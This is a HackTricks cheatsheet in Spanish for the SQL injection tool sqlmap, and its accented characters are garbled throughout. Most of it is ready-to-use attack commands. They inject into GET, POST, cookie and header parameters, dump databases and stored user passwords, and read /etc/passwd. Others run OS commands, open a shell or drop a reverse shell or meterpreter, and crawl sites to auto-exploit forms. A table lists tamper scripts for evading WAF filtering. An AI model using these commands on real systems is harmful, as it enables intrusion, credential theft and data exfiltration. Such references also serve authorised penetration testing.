SQLMap - Cheatsheet

tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Argumentos b谩sicos para SQLmap

Gen茅rico

bash
-u "<URL>"
-p "<PARAM TO TEST>"
--user-agent=SQLMAP
--random-agent
--threads=10
--risk=3 #MAX
--level=5 #MAX
--dbms="<KNOWN DB TECH>"
--os="<OS>"
--technique="UB" #Use only techniques UNION and BLIND in that order (default "BEUSTQ")
--batch #Non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
--auth-type="<AUTH>" #HTTP authentication type (Basic, Digest, NTLM or PKI)
--auth-cred="<AUTH>" #HTTP authentication credentials (name:password)
--proxy=http://127.0.0.1:8080
--union-char "GsFRts2" #Help sqlmap identify union SQLi techniques with a weird union char

Recuperar Informaci贸n

Interno

bash
--current-user #Get current user
--is-dba #Check if current user is Admin
--hostname #Get hostname
--users #Get usernames od DB
--passwords #Get passwords of users in DB
--privileges #Get privileges

Datos de la base de datos

bash
--all #Retrieve everything
--dump #Dump DBMS database table entries
--dbs #Names of the available databases
--tables #Tables of a database ( -D <DB NAME> )
--columns #Columns of a table  ( -D <DB NAME> -T <TABLE NAME> )
-D <DB NAME> -T <TABLE NAME> -C <COLUMN NAME> #Dump column

Usando SQLMapping es una herramienta pr谩ctica que genera comandos y proporciona una visi贸n completa, tanto b谩sica como avanzada, para SQLMap. Incluye ToolTips que explican cada aspecto de la herramienta, detallando cada opci贸n para que puedas mejorar y entender c贸mo usarla de manera eficiente y efectiva.

Lugar de inyecci贸n

Desde la captura de Burp/ZAP

Captura la solicitud y crea un archivo req.txt.

bash
sqlmap -r req.txt --current-user

Inyecci贸n de Solicitud GET

bash
sqlmap -u "http://example.com/?id=1" -p id
sqlmap -u "http://example.com/?id=*" -p id

Inyecci贸n de Solicitud POST

bash
sqlmap -u "http://example.com" --data "username=*&password=*"

Inyecciones en Encabezados y otros M茅todos HTTP

bash
#Inside cookie
sqlmap  -u "http://example.com" --cookie "mycookies=*"

#Inside some header
sqlmap -u "http://example.com" --headers="x-forwarded-for:127.0.0.1*"
sqlmap -u "http://example.com" --headers="referer:*"

#PUT Method
sqlmap --method=PUT -u "http://example.com" --headers="referer:*"

#The injection is located at the '*'

Indique la cadena cuando la inyecci贸n sea exitosa

bash
--string="string_showed_when_TRUE"

Eval

Sqlmap permite el uso de -e o --eval para procesar cada payload antes de enviarlo con un oneliner de python. Esto facilita y acelera el procesamiento de maneras personalizadas del payload antes de enviarlo. En el siguiente ejemplo, la sesi贸n de cookie de flask es firmada por flask con el secreto conocido antes de enviarla:

bash
sqlmap http://1.1.1.1/sqli --eval "from flask_unsign import session as s; session = s.sign({'uid': session}, secret='SecretExfilratedFromTheMachine')" --cookie="session=*" --dump

Shell

bash
#Exec command
python sqlmap.py -u "http://example.com/?id=1" -p id --os-cmd whoami

#Simple Shell
python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell

#Dropping a reverse-shell / meterpreter
python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn

Leer archivo

bash
--file-read=/etc/passwd

Rastrear un sitio web con SQLmap y auto-explotar

bash
sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3

--batch = non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
--crawl = how deep you want to crawl a site
--forms = Parse and test forms

Inyecci贸n de Segundo Orden

bash
python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3
sqlmap -r 1.txt -dbms MySQL -second-order "http://<IP/domain>/joomla/administrator/index.php" -D "joomla" -dbs

Lee esta publicaci贸n sobre c贸mo realizar inyecciones de segundo orden simples y complejas con sqlmap.

Personalizando la Inyecci贸n

Establecer un sufijo

bash
python sqlmap.py -u "http://example.com/?id=1"  -p id --suffix="-- "

Prefijo

bash
python sqlmap.py -u "http://example.com/?id=1"  -p id --prefix="') "

Ayuda para encontrar inyecci贸n booleana

bash
# The --not-string "string" will help finding a string that does not appear in True responses (for finding boolean blind injection)
sqlmap -r r.txt -p id --not-string ridiculous --batch

Tamper

Recuerda que puedes crear tu propio tamper en python y es muy simple. Puedes encontrar un ejemplo de tamper en la p谩gina de Second Order Injection aqu铆.

bash
--tamper=name_of_the_tamper
#In kali you can see all the tampers in /usr/share/sqlmap/tamper
TamperDescripci贸n
apostrophemask.pyReemplaza el car谩cter de ap贸strofe con su contraparte de ancho completo UTF-8
apostrophenullencode.pyReemplaza el car谩cter de ap贸strofe con su contraparte ilegal de doble unicode
appendnullbyte.pyAgrega un car谩cter de byte NULL codificado al final de la carga 煤til
base64encode.pyCodifica en Base64 todos los caracteres en una carga 煤til dada
between.pyReemplaza el operador mayor que ('>') con 'NOT BETWEEN 0 AND #'
bluecoat.pyReemplaza el car谩cter de espacio despu茅s de la declaraci贸n SQL con un car谩cter en blanco aleatorio v谩lido. Luego reemplaza el car谩cter = con el operador LIKE
chardoubleencode.pyCodifica doblemente todos los caracteres en una carga 煤til dada (sin procesar los ya codificados)
commalesslimit.pyReemplaza instancias como 'LIMIT M, N' con 'LIMIT N OFFSET M'
commalessmid.pyReemplaza instancias como 'MID(A, B, C)' con 'MID(A FROM B FOR C)'
concat2concatws.pyReemplaza instancias como 'CONCAT(A, B)' con 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)'
charencode.pyCodifica en URL todos los caracteres en una carga 煤til dada (sin procesar los ya codificados)
charunicodeencode.pyCodifica en URL unicode los caracteres no codificados en una carga 煤til dada (sin procesar los ya codificados). "%u0022"
charunicodeescape.pyCodifica en URL unicode los caracteres no codificados en una carga 煤til dada (sin procesar los ya codificados). "\u0022"
equaltolike.pyReemplaza todas las ocurrencias del operador igual ('=') con el operador 'LIKE'
escapequotes.pyEscapa las comillas (' y ")
greatest.pyReemplaza el operador mayor que ('>') con su contraparte 'GREATEST'
halfversionedmorekeywords.pyAgrega un comentario de MySQL versionado antes de cada palabra clave
ifnull2ifisnull.pyReemplaza instancias como 'IFNULL(A, B)' con 'IF(ISNULL(A), B, A)'
modsecurityversioned.pyEnvuelve la consulta completa con un comentario versionado
modsecurityzeroversioned.pyEnvuelve la consulta completa con un comentario de cero versi贸n
multiplespaces.pyAgrega m煤ltiples espacios alrededor de las palabras clave SQL
nonrecursivereplacement.pyReemplaza palabras clave SQL predefinidas con representaciones adecuadas para el reemplazo (por ejemplo, .replace("SELECT", "")) filtros
percentage.pyAgrega un signo de porcentaje ('%') delante de cada car谩cter
overlongutf8.pyConvierte todos los caracteres en una carga 煤til dada (sin procesar los ya codificados)
randomcase.pyReemplaza cada car谩cter de palabra clave con un valor de caso aleatorio
randomcomments.pyAgrega comentarios aleatorios a las palabras clave SQL
securesphere.pyAgrega una cadena especialmente elaborada
sp_password.pyAgrega 'sp_password' al final de la carga 煤til para ofuscaci贸n autom谩tica de los registros de DBMS
space2comment.pyReemplaza el car谩cter de espacio (' ') con comentarios
space2dash.pyReemplaza el car谩cter de espacio (' ') con un comentario de guion ('--') seguido de una cadena aleatoria y una nueva l铆nea ('\n')
space2hash.pyReemplaza el car谩cter de espacio (' ') con un car谩cter de libra ('#') seguido de una cadena aleatoria y una nueva l铆nea ('\n')
space2morehash.pyReemplaza el car谩cter de espacio (' ') con un car谩cter de libra ('#') seguido de una cadena aleatoria y una nueva l铆nea ('\n')
space2mssqlblank.pyReemplaza el car谩cter de espacio (' ') con un car谩cter en blanco aleatorio de un conjunto v谩lido de caracteres alternativos
space2mssqlhash.pyReemplaza el car谩cter de espacio (' ') con un car谩cter de libra ('#') seguido de una nueva l铆nea ('\n')
space2mysqlblank.pyReemplaza el car谩cter de espacio (' ') con un car谩cter en blanco aleatorio de un conjunto v谩lido de caracteres alternativos
space2mysqldash.pyReemplaza el car谩cter de espacio (' ') con un comentario de guion ('--') seguido de una nueva l铆nea ('\n')
space2plus.pyReemplaza el car谩cter de espacio (' ') con un m谩s ('+')
space2randomblank.pyReemplaza el car谩cter de espacio (' ') con un car谩cter en blanco aleatorio de un conjunto v谩lido de caracteres alternativos
symboliclogical.pyReemplaza los operadores l贸gicos AND y OR con sus contrapartes simb贸licas (&& y
unionalltounion.pyReemplaza UNION ALL SELECT con UNION SELECT
unmagicquotes.pyReemplaza el car谩cter de comillas (') con una combinaci贸n de m煤ltiples bytes %bf%27 junto con un comentario gen茅rico al final (para que funcione)
uppercase.pyReemplaza cada car谩cter de palabra clave con el valor en may煤sculas 'INSERT'
varnish.pyAgrega un encabezado HTTP 'X-originating-IP'
versionedkeywords.pyEnvuelve cada palabra clave no funcional con un comentario de MySQL versionado
versionedmorekeywords.pyEnvuelve cada palabra clave con un comentario de MySQL versionado
xforwardedfor.pyAgrega un encabezado HTTP falso 'X-Forwarded-For'

tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks